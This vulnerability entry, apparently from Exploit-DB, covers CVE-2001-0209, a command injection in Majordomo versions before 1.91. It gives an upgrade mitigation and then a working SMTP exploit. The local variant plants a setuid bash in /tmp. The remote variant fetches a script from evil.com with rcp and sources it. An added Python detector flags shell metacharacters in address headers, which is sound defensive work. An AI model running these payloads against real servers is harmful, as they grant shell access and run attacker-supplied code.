Vendor: Majordomo
By: Unknown
CVSS: 9 (CRITICAL)
Type: Arbitrary Command Execution
CWE: 78
Product Name: Majordomo
Affected Version From: Versions prior to 1.91
Affected Version To: 1.91
Patch Exists: NO
Related CVE: CVE-2001-0209
CPE: a:majordomo:majordomo
Platforms Tested: Unknown

Majordomo Perl-based Internet E-mail List Server Arbitrary Command Execution

Majordomo versions prior to 1.91 incorrectly process specially crafted e-mail headers, allowing arbitrary commands to be executed with the privileges of the Majordomo user. The malicious code is placed in the 'Reply-to' header of the message; the flaw is only reachable when 'advertise' or 'noadvertise' directives are present in the configuration files.

Mitigation:

Upgrade to Majordomo version 1.91 or later. As a workaround until the upgrade is applied, remove any 'advertise' or 'noadvertise' directives from the configuration files.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/2310/info

Majordomo is a Perl-based Internet e-mail list server. Versions prior to 1.91 are vulnerable to an attack whereby specially crafted e-mail headers are incorrectly processed, yielding the ability to execute arbitrary commands with the privileges of Majordomo. This is possible only when "advertise" or "noadvertise" directives are specified in the configuration files.

Local exploit:
--exploit--
telnet localhost 25

helo localhost
mail from: user
rcpt to: majordomo (or whatever the name of the majordomo user is)
data
From: user
To: majordomo
Reply-to: a~.`/bin/cp\${IFS}/bin/bash\${IFS}/tmp/lord&&/bin/chmod\${IFS}4777\${IFS}/tmp/lord`.q~a/ad=cucu/c=blu\\\@kappa.ro

LISTS
.
quit
--end of exploit --

For the remote users, change the Reply-to field to something like:

Reply-to: a~.`/usr/bin/rcp\${IFS}user@evil.com:script\${IFS}/tmp/script&&source\${IFS}/tmp/script`.q~a/ad=cucu/c=blu\\\@kappa.ro
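The header abuse described above can be caught before a message reaches the list server. The following is an added detection example, not part of the Exploit-DB entry or of Majordomo's own code; the header names scanned, the metacharacter pattern and the two sample messages are assumptions constructed for illustration, modelled on the Reply-to payload shown above.

```python
import email
import re
from email import policy

# Address headers a list server derives the requester address from.
# Which ones Majordomo actually consults is an assumption; Reply-To is
# the one the advisory shows being abused.
ADDRESS_HEADERS = ("Reply-To", "From", "Sender")

# Shell metacharacters that never belong in a mailbox address: command
# substitution (backticks, $( ), command chaining, and ${IFS}/$IFS, the
# trick used above to smuggle whitespace into a header value.
SUSPICIOUS = re.compile(r"`|\$\(|\$\{?IFS|&&|\|\||;", re.I)


def scan_message(raw: bytes) -> list[tuple[str, str, str]]:
    """Return (header name, first offending fragment, full header value)
    for every address header whose value carries shell metacharacters.
    compat32 is used so odd header values are returned verbatim rather
    than parsed (and possibly rejected) as structured addresses."""
    msg = email.message_from_bytes(raw, policy=policy.compat32)
    findings = []
    for name in ADDRESS_HEADERS:
        for value in msg.get_all(name, []):
            value = str(value)  # Header objects -> plain text
            match = SUSPICIOUS.search(value)
            if match:
                findings.append((name, match.group(0), value))
    return findings


# Constructed sample: an ordinary subscription request.
BENIGN = b"""From: alice@example.org
To: majordomo@example.org
Reply-To: Alice Example <alice@example.org>

lists
"""

# Constructed sample modelled on the advisory: backticks and ${IFS}
# inside the Reply-To address (the command itself is a harmless touch).
MALICIOUS = b"""From: user@example.org
To: majordomo@example.org
Reply-To: a`/bin/touch${IFS}/tmp/marker`b@example.org

lists
"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, scan_message(sample))
```

A mail filter or log-based detection can call scan_message() on each inbound message and quarantine or alert on any non-empty result; address values are checked verbatim, so folded or non-ASCII headers are still inspected.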